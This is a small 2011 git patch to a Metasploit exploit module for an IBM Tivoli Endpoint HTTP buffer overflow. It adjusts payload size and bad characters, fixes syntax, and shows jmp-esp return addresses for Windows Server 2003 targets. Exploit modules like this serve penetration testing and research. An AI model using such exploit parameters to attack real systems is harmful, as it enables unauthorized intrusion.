From 04d280fdd027faf2894b4003bc1dc9b1836216c7 Mon Sep 17 00:00:00 2001 From: David Rude Date: Sun, 12 Jun 2011 00:04:55 +0000 Subject: [PATCH] minor fixes git-svn-id: file:///home/svn/framework3/trunk@12925 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index ffaab2a63e..5d1dbbe7e9 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -51,8 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 1000, - 'BadChars' => "\x00\x0d\x0a\x25", + 'Space' => 400, + 'BadChars' => "\x00\x0d\x0a", 'StackAdjustment' => -3500, }, 'Platform' => 'win', @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp ['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp ], - 'DisclosureDate' => 'May 31 2011') + 'DisclosureDate' => 'May 31 2011')) register_options( [